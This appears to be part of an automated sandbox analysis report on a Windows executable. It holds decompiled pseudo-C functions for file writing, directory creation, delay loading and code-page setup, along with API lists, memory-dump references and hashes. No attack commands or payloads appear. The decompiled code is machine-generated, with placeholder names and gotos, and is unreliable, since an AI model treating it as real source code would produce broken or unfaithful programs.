					_t15 = E00ED39E2(_t26, _t27, _t36, 0xf0b6a4, __eflags, 0x1024); // executed
					 *(_t43 - 0x10) = _t15;
					 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
					__eflags = _t15;
					if(_t15 == 0) {
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = E00EC1AA7(_t15);
					}
					 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
					_push(0x12);
					_push(0xf0b6a4);
					 *0xf0b690 = _t16;
					_t17 = E00EC1BCE(_t16);
					__eflags = _t17;
					if(_t17 != 0) {
						_t18 = 0;
						__eflags = 0;
					} else {
						_push(_t36);
						_t37 =  *0xf0b690; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							 *0xee7220(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t37))))();
						}
						 *0xf0b690 =  *0xf0b690 & 0x00000000;
						_t18 = 1;
					}
					L13:
					 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
					return _t18;
				}
				if(E00EC2582( *((intOrPtr*)(_t43 - 0x50))) == 0) {
					E00EC264C(0xf0b6a4);
				}
				if(E00EC24CD(0xf0b6a4) != 0) {
					goto L5;
				} else {
					_t18 = 1;
					goto L13;
				}
			}













                                                                                                                0x00eca022
                                                                                                                0x00eca022
                                                                                                                0x00eca022
                                                                                                                0x00eca027
                                                                                                                0x00eca031
                                                                                                                0x00eca037
                                                                                                                0x00eca03d
                                                                                                                0x00eca042
                                                                                                                0x00eca058
                                                                                                                0x00eca07b
                                                                                                                0x00eca080
                                                                                                                0x00eca086
                                                                                                                0x00eca089
                                                                                                                0x00eca08d
                                                                                                                0x00eca08f
                                                                                                                0x00eca09a
                                                                                                                0x00eca09a
                                                                                                                0x00eca091
                                                                                                                0x00eca093
                                                                                                                0x00eca093
                                                                                                                0x00eca09c
                                                                                                                0x00eca0a2
                                                                                                                0x00eca0a4
                                                                                                                0x00eca0a5
                                                                                                                0x00eca0aa
                                                                                                                0x00eca0af
                                                                                                                0x00eca0b1
                                                                                                                0x00eca0dd
                                                                                                                0x00eca0dd
                                                                                                                0x00eca0b3
                                                                                                                0x00eca0b3
                                                                                                                0x00eca0b4
                                                                                                                0x00eca0ba
                                                                                                                0x00eca0bc
                                                                                                                0x00eca0c6
                                                                                                                0x00eca0ce
                                                                                                                0x00eca0ce
                                                                                                                0x00eca0d0
                                                                                                                0x00eca0d9
                                                                                                                0x00eca0da
                                                                                                                0x00eca0df
                                                                                                                0x00eca0e3
                                                                                                                0x00eca0ed
                                                                                                                0x00eca0ed
                                                                                                                0x00eca064
                                                                                                                0x00eca067
                                                                                                                0x00eca067
                                                                                                                0x00eca074
                                                                                                                0x00000000
                                                                                                                0x00eca076
                                                                                                                0x00eca078
                                                                                                                0x00000000
                                                                                                                0x00eca078

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: SSSS.exe
                                                                                                                • API String ID: 3519838083-2379260107
                                                                                                                • Opcode ID: 89c9910c877354409f9e56a2a6b3c4b9b066d53ed6e1e28bb45945551d364cdd
                                                                                                                • Instruction ID: 5ee3feb3843da12b95ea3694a099ee9f12f73cca88f5c0d286a2576d3ec89d14
                                                                                                                • Opcode Fuzzy Hash: 89c9910c877354409f9e56a2a6b3c4b9b066d53ed6e1e28bb45945551d364cdd
                                                                                                                • Instruction Fuzzy Hash: 6311D231A012589ADB10BB749A03BEE73A5AF45358F0450BDF846F7282DB774D439A52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED26DD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemText_swprintf
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 3011073432-4271059343
                                                                                                                • Opcode ID: 96e7ed0039e05aac3438a03665b5ad5535208a8690ab720016a035b8e1ee9cbe
                                                                                                                • Instruction ID: c7419717d222576165ff31079d9cb8dc1eb8836fb5a6be274955bc7608467709
                                                                                                                • Opcode Fuzzy Hash: 96e7ed0039e05aac3438a03665b5ad5535208a8690ab720016a035b8e1ee9cbe
                                                                                                                • Instruction Fuzzy Hash: 3AF0EC7265434C7ADB11E7708D06F9A3B5CE704741F04119AB600B21A3D9779A225796
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A34, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A34() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26128); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*$4*
                                                                                                                • API String ID: 1269201914-2716498671
                                                                                                                • Opcode ID: 609d2aefafaf8e1ad6688d604ff4dbefcd2ad6a4b4e3f75cb8a82a7bc3a32eb7
                                                                                                                • Instruction ID: 50bffdae7878f358ed0b8efc3ae494c8a08939c8d3472f367d18e0997587e65a
                                                                                                                • Opcode Fuzzy Hash: 609d2aefafaf8e1ad6688d604ff4dbefcd2ad6a4b4e3f75cb8a82a7bc3a32eb7
                                                                                                                • Instruction Fuzzy Hash: 3CB012952582926D31A451162E02C3A038CC3D4F10330E12FF100E9242D4801D461033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC22CF, Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E00EC22CF(void* __edx, void* _a4, long _a8) {
				char _v4;
				long _v8;
				void* __ecx;
				void* __ebp;
				int _t28;
				intOrPtr _t31;
				long _t36;
				int _t39;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t58;
				intOrPtr _t62;
				void* _t66;
				long _t68;

				_t58 = __edx;
				_t68 = _a8;
				_t49 = _t50;
				if(_t68 != 0) {
					if( *((intOrPtr*)(_t49 + 0xc)) == 1) {
						 *(_t49 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						do {
							_v8 = _v8 & 0x00000000;
							_v4 = 0;
							if( *((intOrPtr*)(_t49 + 0xc)) == 0) {
								_t28 = WriteFile( *(_t49 + 4), _a4, _t68,  &_v8, 0); // executed
								asm("sbb al, al");
								_t31 =  ~(_t28 - 1) + 1;
								_v4 = _t31;
								L14:
								if(_t31 != 0) {
									L22:
									 *((char*)(_t49 + 8)) = 1;
									return _v4;
								}
								L15:
								if( *((char*)(_t49 + 0x14)) == 0 ||  *((intOrPtr*)(_t49 + 0xc)) != 0) {
									goto L22;
								} else {
									_t18 = _t49 + 0x1e; // 0x1e
									_t65 = _t18;
									if(E00EC17EF(0xf10b74, _t18, 0) == 0) {
										E00EC1A38(0xf10b74, _t68, 0, _t65);
										goto L22;
									}
									goto L18;
								}
							}
							_t66 = 0;
							if(_t68 == 0) {
								goto L15;
							} else {
								goto L8;
							}
							while(1) {
								L8:
								_t36 = _t68 - _t66;
								if(_t36 >= 0x4000) {
									_t36 = 0x4000;
								}
								_t39 = WriteFile( *(_t49 + 4), _a4 + _t66, _t36,  &_v8, 0);
								asm("sbb al, al");
								_t31 =  ~(_t39 - 1) + 1;
								_v4 = _t31;
								if(_t31 == 0) {
									goto L15;
								}
								_t66 = _t66 + 0x4000;
								if(_t66 < _t68) {
									continue;
								}
								goto L14;
							}
							goto L15;
							L18:
						} while (_v8 >= _t68 || _v8 <= 0);
						_t62 =  *_t49;
						 *0xee7220(0);
						_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14))))();
						asm("sbb edx, 0x0");
						 *0xee7220(_t43 - _v8, _t58);
						 *((intOrPtr*)(_t62 + 0x10))();
					}
				}
				return 1;
			}


















                                                                                                                0x00ec22cf
                                                                                                                0x00ec22d3
                                                                                                                0x00ec22d7
                                                                                                                0x00ec22db
                                                                                                                0x00ec22e8
                                                                                                                0x00ec22f2
                                                                                                                0x00ec22f2
                                                                                                                0x00ec22f7
                                                                                                                0x00ec22fc
                                                                                                                0x00ec22fc
                                                                                                                0x00ec2305
                                                                                                                0x00ec230a
                                                                                                                0x00ec2358
                                                                                                                0x00ec2361
                                                                                                                0x00ec2363
                                                                                                                0x00ec2365
                                                                                                                0x00ec2369
                                                                                                                0x00ec236b
                                                                                                                0x00ec23de
                                                                                                                0x00ec23e3
                                                                                                                0x00000000
                                                                                                                0x00ec23e7
                                                                                                                0x00ec236d
                                                                                                                0x00ec2371
                                                                                                                0x00000000
                                                                                                                0x00ec2379
                                                                                                                0x00ec237b
                                                                                                                0x00ec237b
                                                                                                                0x00ec238b
                                                                                                                0x00ec23d9
                                                                                                                0x00000000
                                                                                                                0x00ec23d9
                                                                                                                0x00000000
                                                                                                                0x00ec238b
                                                                                                                0x00ec2371
                                                                                                                0x00ec230c
                                                                                                                0x00ec2310
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec2312
                                                                                                                0x00ec2312
                                                                                                                0x00ec2314
                                                                                                                0x00ec2318
                                                                                                                0x00ec231a
                                                                                                                0x00ec231a
                                                                                                                0x00ec232e
                                                                                                                0x00ec2337
                                                                                                                0x00ec2339
                                                                                                                0x00ec233b
                                                                                                                0x00ec233f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec2341
                                                                                                                0x00ec2345
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec2347
                                                                                                                0x00000000
                                                                                                                0x00ec238d
                                                                                                                0x00ec238d
                                                                                                                0x00ec23a2
                                                                                                                0x00ec23ab
                                                                                                                0x00ec23b3
                                                                                                                0x00ec23bc
                                                                                                                0x00ec23c1
                                                                                                                0x00ec23c9
                                                                                                                0x00ec23c9
                                                                                                                0x00ec22f7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F5,?,00010000,00000000,00000000,00EC9EDC,?,?,00ECA6A9,00EFB58C,?,00ECAFED,00010000), ref: 00EC22EC
                                                                                                                • WriteFile.KERNEL32(?,?,00ECAFED,00000000,00000000), ref: 00EC232E
                                                                                                                • WriteFile.KERNELBASE(?,?,00ECAFED,00000000,00000000,00000116,?,?,00010000,00000000,00000000,00EC9EDC,?,?,00ECA6A9,00EFB58C), ref: 00EC2358
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite$Handle
                                                                                                                • String ID:
                                                                                                                • API String ID: 4209713984-0
                                                                                                                • Opcode ID: 6b65a10764624a618b67dccee681c4578e47888945aba73cb8e9c2684b98dc58
                                                                                                                • Instruction ID: 110c0289359e1e649ac0350b8ccc076c9d5658e9afe7170bbc9b0fcbf73e1a93
                                                                                                                • Opcode Fuzzy Hash: 6b65a10764624a618b67dccee681c4578e47888945aba73cb8e9c2684b98dc58
                                                                                                                • Instruction Fuzzy Hash: 503128701083469FDB14CF14DE44F6ABB94EB41714F04155DFA80BB191CB76D84ACBB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC25B6, Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC25B6(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E00ED3370();
				_t21 = _a4;
				_t8 =  *(E00EC36A8(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00EC2520(_t21) != 0 || E00EC3399(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E00EC27F3(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}









                                                                                                                0x00ec25be
                                                                                                                0x00ec25c4
                                                                                                                0x00ec25cd
                                                                                                                0x00ec25d3
                                                                                                                0x00ec25e7
                                                                                                                0x00ec25ef
                                                                                                                0x00ec262d
                                                                                                                0x00ec2633
                                                                                                                0x00ec2636
                                                                                                                0x00ec2642
                                                                                                                0x00ec2644
                                                                                                                0x00ec2638
                                                                                                                0x00ec2638
                                                                                                                0x00ec263b
                                                                                                                0x00000000
                                                                                                                0x00ec263d
                                                                                                                0x00ec263f
                                                                                                                0x00ec263f
                                                                                                                0x00ec263b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec25da
                                                                                                                0x00ec25dd
                                                                                                                0x00ec25e5
                                                                                                                0x00ec261a
                                                                                                                0x00ec261e
                                                                                                                0x00ec2624
                                                                                                                0x00ec2624
                                                                                                                0x00ec2629
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec25e5
                                                                                                                0x00ec2649

                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,?), ref: 00EC25DD
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?), ref: 00EC2610
                                                                                                                • GetLastError.KERNEL32(?,?), ref: 00EC262D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2485089472-0
                                                                                                                • Opcode ID: fe70b19c288ce92c476d1e7fb9e240a95211b03a51597ee7210cdf60eaae55d5
                                                                                                                • Instruction ID: 31b454a4315b227ea2f63b567ffbbf5d6a01f4cdd1bbb7859aad5c3a404b120e
                                                                                                                • Opcode Fuzzy Hash: fe70b19c288ce92c476d1e7fb9e240a95211b03a51597ee7210cdf60eaae55d5
                                                                                                                • Instruction Fuzzy Hash: B20128715011546ADB329B644F45FFE339C9F0A388F04148DFF81F5090DB66C9838AB6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED24B4, Relevance: 4.5, APIs: 3, Instructions: 25synchronizationwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED24B4(void* _a4) {
				struct tagMSG _v32;
				long _t4;

				_t4 = WaitForSingleObject(_a4, 0xa);
				while(_t4 == 0x102) {
					PeekMessageW( &_v32, 0, 0, 0, 1); // executed
					_t4 = WaitForSingleObject(_a4, 0xa);
				}
				return _t4;
			}





                                                                                                                0x00ed24c0
                                                                                                                0x00ed24ea
                                                                                                                0x00ed24d9
                                                                                                                0x00ed24e4
                                                                                                                0x00ed24e4
                                                                                                                0x00ed24f2

                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00ED24C0
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED24D9
                                                                                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00ED24E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSingleWait$MessagePeek
                                                                                                                • String ID:
                                                                                                                • API String ID: 1965964400-0
                                                                                                                • Opcode ID: 34f16398f15ba3b29fb85f158717215796ff349e056164b5a7e494448e84fa29
                                                                                                                • Instruction ID: b28286827aa3b68431032f31b4a334280b8f4364f6c51928c6c3db01eef318c6
                                                                                                                • Opcode Fuzzy Hash: 34f16398f15ba3b29fb85f158717215796ff349e056164b5a7e494448e84fa29
                                                                                                                • Instruction Fuzzy Hash: 88E0203174030CB7EB206B55DC4AF8A7B2DE760B01F108012FF06FD1D1C6B2545297A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE00C4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E00EE00C4(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0xef1558; // 0xf529bb33
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0xee0716
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0xee0716
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E00EE1138(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0x7d8b57fc
					E00EDF34E(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0x7d8b57fc
					E00EDF34E(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E00ED3C6A(_v8 ^ _t102);
			}































                                                                                                                0x00ee00c4
                                                                                                                0x00ee00cf
                                                                                                                0x00ee00d6
                                                                                                                0x00ee00db
                                                                                                                0x00ee00e6
                                                                                                                0x00ee00f8
                                                                                                                0x00ee01f0
                                                                                                                0x00ee01f0
                                                                                                                0x00ee01f6
                                                                                                                0x00ee01f8
                                                                                                                0x00ee01f9
                                                                                                                0x00ee01f9
                                                                                                                0x00ee01fb
                                                                                                                0x00ee0201
                                                                                                                0x00ee0201
                                                                                                                0x00ee0203
                                                                                                                0x00ee0205
                                                                                                                0x00ee020e
                                                                                                                0x00ee0211
                                                                                                                0x00ee021d
                                                                                                                0x00ee0224
                                                                                                                0x00ee0234
                                                                                                                0x00ee0226
                                                                                                                0x00ee0226
                                                                                                                0x00ee0229
                                                                                                                0x00ee0229
                                                                                                                0x00ee0229
                                                                                                                0x00ee022d
                                                                                                                0x00ee022d
                                                                                                                0x00000000
                                                                                                                0x00ee022d
                                                                                                                0x00ee0213
                                                                                                                0x00ee0213
                                                                                                                0x00ee0218
                                                                                                                0x00ee0218
                                                                                                                0x00ee0230
                                                                                                                0x00ee0230
                                                                                                                0x00ee0230
                                                                                                                0x00ee0236
                                                                                                                0x00ee023c
                                                                                                                0x00ee023c
                                                                                                                0x00ee0242
                                                                                                                0x00ee0243
                                                                                                                0x00ee0243
                                                                                                                0x00ee00fe
                                                                                                                0x00ee00fe
                                                                                                                0x00ee0100
                                                                                                                0x00ee0100
                                                                                                                0x00ee0107
                                                                                                                0x00ee0108
                                                                                                                0x00ee010c
                                                                                                                0x00ee0112
                                                                                                                0x00ee0118
                                                                                                                0x00ee0140
                                                                                                                0x00ee0140
                                                                                                                0x00ee0142
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee0121
                                                                                                                0x00ee0125
                                                                                                                0x00ee0137
                                                                                                                0x00ee0137
                                                                                                                0x00ee0139
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee012a
                                                                                                                0x00ee012c
                                                                                                                0x00ee012e
                                                                                                                0x00ee0136
                                                                                                                0x00ee0136
                                                                                                                0x00000000
                                                                                                                0x00ee0136
                                                                                                                0x00000000
                                                                                                                0x00ee012c
                                                                                                                0x00ee013b
                                                                                                                0x00ee013b
                                                                                                                0x00ee013e
                                                                                                                0x00ee013e
                                                                                                                0x00ee0145
                                                                                                                0x00ee015a
                                                                                                                0x00ee0160
                                                                                                                0x00ee0174
                                                                                                                0x00ee017b
                                                                                                                0x00ee018a
                                                                                                                0x00ee019c
                                                                                                                0x00ee01a3
                                                                                                                0x00ee01ab
                                                                                                                0x00ee01ad
                                                                                                                0x00ee01ad
                                                                                                                0x00ee01b7
                                                                                                                0x00ee01c7
                                                                                                                0x00ee01c9
                                                                                                                0x00ee01e0
                                                                                                                0x00ee01cb
                                                                                                                0x00ee01cb
                                                                                                                0x00ee01cb
                                                                                                                0x00ee01cb
                                                                                                                0x00ee01d0
                                                                                                                0x00000000
                                                                                                                0x00ee01d0
                                                                                                                0x00ee01b9
                                                                                                                0x00ee01b9
                                                                                                                0x00ee01be
                                                                                                                0x00ee01d7
                                                                                                                0x00ee01d7
                                                                                                                0x00ee01d7
                                                                                                                0x00ee01e7
                                                                                                                0x00ee01e8
                                                                                                                0x00ee01ec
                                                                                                                0x00ee0257

                                                                                                                APIs
